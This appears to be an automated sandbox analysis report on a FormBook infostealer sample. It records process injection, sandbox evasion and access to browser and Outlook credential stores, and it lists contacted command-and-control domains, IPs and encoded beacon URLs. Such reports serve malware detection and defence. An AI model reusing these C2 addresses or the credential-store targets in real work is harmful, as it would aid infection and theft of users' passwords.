                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\mobsync.exeThread register set: target process: 4520Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\mobsync.exeThread APC queued: target process: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exeJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2BBB008Jump to behavior
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003EB106 LogonUserW,0_2_003EB106
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003B3D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_003B3D19
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003F411C SendInput,keybd_event,0_2_003F411C
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003F74BB mouse_event,0_2_003F74BB
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\qbSIgCrCgw.exe"Jump to behavior
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exeProcess created: C:\Windows\SysWOW64\mobsync.exe "C:\Windows\SysWOW64\mobsync.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003EA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_003EA66C
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003F71FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_003F71FA
                Source: qbSIgCrCgw.exe, WafZCahkNS.exe, 00000004.00000002.3900197008.00000000014F0000.00000002.00000001.00040000.00000000.sdmp, WafZCahkNS.exe, 00000004.00000000.1589036985.00000000014F1000.00000002.00000001.00040000.00000000.sdmp, WafZCahkNS.exe, 00000008.00000000.1745156629.0000000000D91000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: WafZCahkNS.exe, 00000004.00000002.3900197008.00000000014F0000.00000002.00000001.00040000.00000000.sdmp, WafZCahkNS.exe, 00000004.00000000.1589036985.00000000014F1000.00000002.00000001.00040000.00000000.sdmp, WafZCahkNS.exe, 00000008.00000000.1745156629.0000000000D91000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: WafZCahkNS.exe, 00000004.00000002.3900197008.00000000014F0000.00000002.00000001.00040000.00000000.sdmp, WafZCahkNS.exe, 00000004.00000000.1589036985.00000000014F1000.00000002.00000001.00040000.00000000.sdmp, WafZCahkNS.exe, 00000008.00000000.1745156629.0000000000D91000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: 0Program Manager
                Source: qbSIgCrCgw.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                Source: WafZCahkNS.exe, 00000004.00000002.3900197008.00000000014F0000.00000002.00000001.00040000.00000000.sdmp, WafZCahkNS.exe, 00000004.00000000.1589036985.00000000014F1000.00000002.00000001.00040000.00000000.sdmp, WafZCahkNS.exe, 00000008.00000000.1745156629.0000000000D91000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003D65C4 cpuid 0_2_003D65C4
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_0040091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,0_2_0040091D
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_0042B340 GetUserNameW,0_2_0042B340
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003E1E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_003E1E8E
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003CDDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_003CDDC0
                Source: qbSIgCrCgw.exe, 00000000.00000003.1432082615.0000000000FC5000.00000004.00000020.00020000.00000000.sdmp, qbSIgCrCgw.exe, 00000000.00000003.1432178200.000000000103C000.00000004.00000020.00020000.00000000.sdmp, qbSIgCrCgw.exe, 00000000.00000002.1445241515.000000000103C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: procmon.exe

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.3900807992.0000000002280000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3898728526.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1668607265.00000000033A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3898911867.0000000002CE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1668177200.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3899007570.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1669021668.0000000005A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3900792299.0000000004940000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\mobsync.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\mobsync.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: qbSIgCrCgw.exeBinary or memory string: WIN_81
                Source: qbSIgCrCgw.exeBinary or memory string: WIN_XP
                Source: qbSIgCrCgw.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
                Source: qbSIgCrCgw.exeBinary or memory string: WIN_XPe
                Source: qbSIgCrCgw.exeBinary or memory string: WIN_VISTA
                Source: qbSIgCrCgw.exeBinary or memory string: WIN_7
                Source: qbSIgCrCgw.exeBinary or memory string: WIN_8

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.3900807992.0000000002280000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3898728526.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1668607265.00000000033A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3898911867.0000000002CE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1668177200.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3899007570.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1669021668.0000000005A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3900792299.0000000004940000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_00408C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00408C4F
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_0040923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_0040923B

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts                		2
                Native API                		1
                DLL Side-Loading                		1
                Exploitation for Privilege Escalation                		1
                Disable or Modify Tools                		1
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		5
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts                		1
                Abuse Elevation Control Mechanism                		1
                Deobfuscate/Decode Files or Information                		21
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol1
                Data from Local System                		1
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		1
                Abuse Elevation Control Mechanism                		Security Account Manager2
                File and Directory Discovery                		SMB/Windows Admin Shares1
                Email Collection                		5
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts                		3
                Obfuscated Files or Information                		NTDS116
                System Information Discovery                		Distributed Component Object Model21
                Input Capture                		5
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation                		1
                DLL Side-Loading                		LSA Secrets261
                Security Software Discovery                		SSH3
                Clipboard Data                		Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                Process Injection                		2
                Valid Accounts                		Cached Domain Credentials2
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Virtualization/Sandbox Evasion                		DCSync3
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation                		Proc Filesystem11
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                Process Injection                		/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1589092 Sample: qbSIgCrCgw.exe Startdate: 11/01/2025 Architecture: WINDOWS Score: 100 28 www.tals.xyz 2->28 30 www.logidant.xyz 2->30 32 18 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Antivirus detection for URL or domain 2->44 46 Multi AV Scanner detection for submitted file 2->46 50 4 other signatures 2->50 10 qbSIgCrCgw.exe 2 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 30->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 10->64 66 Writes to foreign memory regions 10->66 68 2 other signatures 10->68 13 svchost.exe 10->13         started        process6 signatures7 70 Maps a DLL or memory area into another process 13->70 16 WafZCahkNS.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 mobsync.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 WafZCahkNS.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 logidant.xyz 45.141.156.114, 49928, 49944, 49964 YURTEH-ASUA Germany 22->34 36 www.canadavinreport.site 185.27.134.206, 49737, 49756, 49774 WILDCARD-ASWildcardUKLimitedGB United Kingdom 22->36 38 11 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                qbSIgCrCgw.exe75%ReversingLabsWin32.Trojan.AutoitInject
                qbSIgCrCgw.exe68%VirustotalBrowse
                qbSIgCrCgw.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://www.cstrategy.online/zz3m/?DzLTc=p4da2npHVYx4RJTvd9az3TD70%Avira URL Cloudsafe
                http://www.madhf.tech/0mwe/?DzLTc=I6/MvosI1M4GXnAC7bSYGFqrxYdgJTNe9tmkEszzRtOWIwRcIvXs05Ha3jXYoQpxdY0%Avira URL Cloudsafe
                http://www.tals.xyz/k1td/0%Avira URL Cloudsafe
                http://www.bloodbalancecaps.shop/r9qi/0%Avira URL Cloudsafe
                http://www.canadavinreport.site/g3h7/0%Avira URL Cloudsafe
                http://www.canadavinreport.site/g3h7/?DzLTc=dyqW+SkpLS8uL5dRky9k7MKcOglS/8z1zEHoC4ozp/UuBc9Lrzv6UHKMHP5rOiU//FkNbu8cLS6TGHyjoU1BRvMsWNScFLLtPX2xNM4zETNmxHASFhTRGutFERc3E41rkQ==&m8=urJ0WtmP0FPTTB0%Avira URL Cloudsafe
                http://www.madhf.tech/0mwe/?DzLTc=I6/MvosI1M4GXnAC7bSYGFqrxYdgJTNe9tmkEszzRtOWIwRcIvXs05Ha3jXYoQpxdY5hB0FWQM1VzVFsJbVN45JDeb7ji4WvSMSl4p5VjB9j7uxKBUhToKF7GDp/0AaWeg==&m8=urJ0WtmP0FPTTB0%Avira URL Cloudsafe
                http://www.zkdamdjj.shop/kf1m/?DzLTc=gD/FPiA75bYZCbZDbB+WsVUzjKMJP+r4HqBHW8I3+Q/3qqcwdH4XqO3fnm/yt4rkfBlpHF229jnZH/lk0nBoXOKBKPZyn2cike7Ub3qNJZbDUNl9s1XUkaYGScVYwZ61FA==&m8=urJ0WtmP0FPTTB0%Avira URL Cloudsafe
                http://www.airrelax.shop/an34/?m8=urJ0WtmP0FPTTB&DzLTc=CNTdLyZz4y5GtyaihT4QjOii4vbhvEXfI6qLlcD2dwDay6yy3VddH/MIEeXBPGgw7Dla3BC4dxGnjsgYjSxnMH2Hc8XocnANWTB8FhPTbLNabm+q6O9g6Njbhwnq8CC3Yg==0%Avira URL Cloudsafe
                http://www.canadavinreport.site/g3h7/?DzLTc=dyqW0%Avira URL Cloudsafe
                http://www.cstrategy.online/zz3m/?DzLTc=p4da2npHVYx4RJTvd9az3TD7+hR5I2wPXRunqm38WzEuQm6NKJG/l1bLZhOfnTn2NFbWxBmCDQqA3K9Xvzl9TW5cdeUdvoi/F++BAfC2g+APWC2NffnCCUzK9ka60xikyw==&m8=urJ0WtmP0FPTTB0%Avira URL Cloudsafe
                http://www.airrelax.shop/an34/0%Avira URL Cloudsafe
                http://www.yunlekeji.top/t322/?DzLTc=FCfXCbowRdQKA3bKzmWhb/MMDIYWCwffvgnpa1jm1l5RPo8GmzCZxrunal2GKioIIi33qnUs85PYplnvRA3XR8V86LXkcIGT0dmKE8rYJBtcLljpCBGaC+nO46fC9uxVPg==&m8=urJ0WtmP0FPTTB0%Avira URL Cloudsafe
                http://www.zkdamdjj.shop/kf1m/0%Avira URL Cloudsafe
                http://www.izmirescortg.xyz/lnl7/?m8=urJ0WtmP0FPTTB&DzLTc=kAPJ1zL1a1XedmcrdtHAbU+8MxIg1b6JbBGKYGigv+9peDDnEk+ogR7nF5sJltA40tggf7QxXQcZwaMcwHfgZUCCvIMy+6OdADZldWa3Ro5vmyUj0qJuSG5eCoJgas7XnA==0%Avira URL Cloudsafe
                http://www.logidant.xyz/iuvu/0%Avira URL Cloudsafe
                http://www.tals.xyz/k1td/?m8=urJ0WtmP0FPTTB&DzLTc=oEMxw+ab8QlEZmTmAbDEuuFmAVWx5xMHQHNpbkBMxCjDr7HlodnZgfFsQKGKkvz/XYzpvPMYep3+sZsYYHcCTHyrYyRaD0W2SHbUYxhUJeAm2Jm3PlTqYYqojkKZ3lrXmQ==0%Avira URL Cloudsafe
                http://www.brightvision.website/gn26/?DzLTc=fgpTVhEuh+HnR3p0lfNLmVuUqPxSLN4hCHlB5YwrT5j1SjgoO/sQ0W1xqV3uB3iqP4rffdiJ/shc0ougvjbd9MI5QldmEc54Vqz3e9231X82gi2igW+4eDd38X27Ejj4Gw==&m8=urJ0WtmP0FPTTB0%Avira URL Cloudsafe
                http://www.laohub10.net/36be/?m8=urJ0WtmP0FPTTB&DzLTc=zT+fCPSXWqCfWPgMnoOydtJKsJuCEtGx9/DVuG0pIlquWt59hgdSk8Rx6eVvndf2YPyLwPhL3z2g/EyQU+U7rC5vzNz0ZFCw8d/R3+K3cKRBUeMTJLe+XGej8HjBlTXN1Q==0%Avira URL Cloudsafe
                http://www.cstrategy.online/zz3m/0%Avira URL Cloudsafe
                http://www.aballanet.cat/6xrr/?DzLTc=HxJAUmNG5a+243k7lB56qNhkSq7m2edDyQfNvKnIMmllTqWhJmPDYD6FfyD5P2YCiK6XZxIiPJwBP5cvXMaBQY2hj09WsNhqz7jh3pjJtHZ6ivVVWaE+CFUoLu/IsL675g==&m8=urJ0WtmP0FPTTB100%Avira URL Cloudmalware
                https://keyq.top/$0%Avira URL Cloudsafe
                http://www.aballanet.cat/6xrr/100%Avira URL Cloudmalware
                http://www.laohub10.net/36be/0%Avira URL Cloudsafe
                http://aballanet.cat/6xrr/?DzLTc=HxJAUmNG5a100%Avira URL Cloudmalware
                http://www.logidant.xyz/iuvu/?DzLTc=4GSi4NjhieA+eby0NKQzTEPCPA5td1TZNopVgGr+MixqN2kv+x7vZ9YkKN38Qwr7I1LnRiqAhNhB07BIn5yne0LzqH+H8Nzlr/8TCrRqA4T6hsg8YSRhr2x7F+rJ6nzbiw==&m8=urJ0WtmP0FPTTB0%Avira URL Cloudsafe
                http://www.yunlekeji.top/t322/0%Avira URL Cloudsafe
                http://www.madhf.tech/0mwe/0%Avira URL Cloudsafe
                http://www.brightvision.website/gn26/0%Avira URL Cloudsafe
                http://www.bloodbalancecaps.shop0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                www.brightvision.website
                		203.161.42.73
                		truefalse
                  		unknown
                  www.madhf.tech
                  		103.224.182.242
                  		truefalse
                    		high
                    r0lqcud7.nbnnn.xyz
                    		202.79.161.151
                    		truefalse
                      		high
                      logidant.xyz
                      		45.141.156.114
                      		truefalse
                        		high
                        www.zkdamdjj.shop
                        		188.114.97.3
                        		truefalse
                          		high
                          www.airrelax.shop
                          		172.67.215.235
                          		truefalse
                            		high
                            www.canadavinreport.site
                            		185.27.134.206
                            		truefalse
                              		high
                              www.izmirescortg.xyz
                              		172.67.186.192
                              		truefalse
                                		high
                                cstrategy.online
                                		194.76.119.60
                                		truefalse
                                  		unknown
                                  fap-a13f5c64.faipod.com
                                  		165.154.96.210
                                  		truefalse
                                    		unknown
                                    www.tals.xyz
                                    		13.248.169.48
                                    		truefalse
                                      		high
                                      bloodbalancecaps.shop
                                      		108.179.253.197
                                      		truefalse
                                        		unknown
                                        aballanet.cat
                                        		134.0.14.158
                                        		truefalse
                                          		unknown
                                          www.logidant.xyz
                                          		unknown
                                          		unknownfalse
                                            		high
                                            www.cstrategy.online
                                            		unknown
                                            		unknownfalse
                                              		unknown
                                              www.bloodbalancecaps.shop
                                              		unknown
                                              		unknownfalse
                                                		unknown
                                                www.laohub10.net
                                                		unknown
                                                		unknownfalse
                                                  		high
                                                  www.aballanet.cat
                                                  		unknown
                                                  		unknownfalse
                                                    		unknown
                                                    www.yunlekeji.top
                                                    		unknown
                                                    		unknownfalse
                                                      		high

                                                      Contacted URLs

                                                      NameMaliciousAntivirus DetectionReputation
                                                      http://www.canadavinreport.site/g3h7/?DzLTc=dyqW+SkpLS8uL5dRky9k7MKcOglS/8z1zEHoC4ozp/UuBc9Lrzv6UHKMHP5rOiU//FkNbu8cLS6TGHyjoU1BRvMsWNScFLLtPX2xNM4zETNmxHASFhTRGutFERc3E41rkQ==&m8=urJ0WtmP0FPTTBfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.canadavinreport.site/g3h7/false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.madhf.tech/0mwe/?DzLTc=I6/MvosI1M4GXnAC7bSYGFqrxYdgJTNe9tmkEszzRtOWIwRcIvXs05Ha3jXYoQpxdY5hB0FWQM1VzVFsJbVN45JDeb7ji4WvSMSl4p5VjB9j7uxKBUhToKF7GDp/0AaWeg==&m8=urJ0WtmP0FPTTBtrue
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.airrelax.shop/an34/?m8=urJ0WtmP0FPTTB&DzLTc=CNTdLyZz4y5GtyaihT4QjOii4vbhvEXfI6qLlcD2dwDay6yy3VddH/MIEeXBPGgw7Dla3BC4dxGnjsgYjSxnMH2Hc8XocnANWTB8FhPTbLNabm+q6O9g6Njbhwnq8CC3Yg==false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.zkdamdjj.shop/kf1m/?DzLTc=gD/FPiA75bYZCbZDbB+WsVUzjKMJP+r4HqBHW8I3+Q/3qqcwdH4XqO3fnm/yt4rkfBlpHF229jnZH/lk0nBoXOKBKPZyn2cike7Ub3qNJZbDUNl9s1XUkaYGScVYwZ61FA==&m8=urJ0WtmP0FPTTBfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.tals.xyz/k1td/false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.bloodbalancecaps.shop/r9qi/false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.cstrategy.online/zz3m/?DzLTc=p4da2npHVYx4RJTvd9az3TD7+hR5I2wPXRunqm38WzEuQm6NKJG/l1bLZhOfnTn2NFbWxBmCDQqA3K9Xvzl9TW5cdeUdvoi/F++BAfC2g+APWC2NffnCCUzK9ka60xikyw==&m8=urJ0WtmP0FPTTBfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.izmirescortg.xyz/lnl7/?m8=urJ0WtmP0FPTTB&DzLTc=kAPJ1zL1a1XedmcrdtHAbU+8MxIg1b6JbBGKYGigv+9peDDnEk+ogR7nF5sJltA40tggf7QxXQcZwaMcwHfgZUCCvIMy+6OdADZldWa3Ro5vmyUj0qJuSG5eCoJgas7XnA==false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.airrelax.shop/an34/false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.logidant.xyz/iuvu/false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.zkdamdjj.shop/kf1m/false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.cstrategy.online/zz3m/false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.yunlekeji.top/t322/?DzLTc=FCfXCbowRdQKA3bKzmWhb/MMDIYWCwffvgnpa1jm1l5RPo8GmzCZxrunal2GKioIIi33qnUs85PYplnvRA3XR8V86LXkcIGT0dmKE8rYJBtcLljpCBGaC+nO46fC9uxVPg==&m8=urJ0WtmP0FPTTBfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.brightvision.website/gn26/?DzLTc=fgpTVhEuh+HnR3p0lfNLmVuUqPxSLN4hCHlB5YwrT5j1SjgoO/sQ0W1xqV3uB3iqP4rffdiJ/shc0ougvjbd9MI5QldmEc54Vqz3e9231X82gi2igW+4eDd38X27Ejj4Gw==&m8=urJ0WtmP0FPTTBfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.tals.xyz/k1td/?m8=urJ0WtmP0FPTTB&DzLTc=oEMxw+ab8QlEZmTmAbDEuuFmAVWx5xMHQHNpbkBMxCjDr7HlodnZgfFsQKGKkvz/XYzpvPMYep3+sZsYYHcCTHyrYyRaD0W2SHbUYxhUJeAm2Jm3PlTqYYqojkKZ3lrXmQ==false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.laohub10.net/36be/?m8=urJ0WtmP0FPTTB&DzLTc=zT+fCPSXWqCfWPgMnoOydtJKsJuCEtGx9/DVuG0pIlquWt59hgdSk8Rx6eVvndf2YPyLwPhL3z2g/EyQU+U7rC5vzNz0ZFCw8d/R3+K3cKRBUeMTJLe+XGej8HjBlTXN1Q==false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.aballanet.cat/6xrr/?DzLTc=HxJAUmNG5a+243k7lB56qNhkSq7m2edDyQfNvKnIMmllTqWhJmPDYD6FfyD5P2YCiK6XZxIiPJwBP5cvXMaBQY2hj09WsNhqz7jh3pjJtHZ6ivVVWaE+CFUoLu/IsL675g==&m8=urJ0WtmP0FPTTBfalse
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://www.aballanet.cat/6xrr/false
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://www.laohub10.net/36be/false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.brightvision.website/gn26/false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.logidant.xyz/iuvu/?DzLTc=4GSi4NjhieA+eby0NKQzTEPCPA5td1TZNopVgGr+MixqN2kv+x7vZ9YkKN38Qwr7I1LnRiqAhNhB07BIn5yne0LzqH+H8Nzlr/8TCrRqA4T6hsg8YSRhr2x7F+rJ6nzbiw==&m8=urJ0WtmP0FPTTBfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.madhf.tech/0mwe/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.yunlekeji.top/t322/false
                                                      • Avira URL Cloud: safe
                                                      		unknown

                                                      URLs from Memory and Binaries

                                                      NameSourceMaliciousAntivirus DetectionReputation
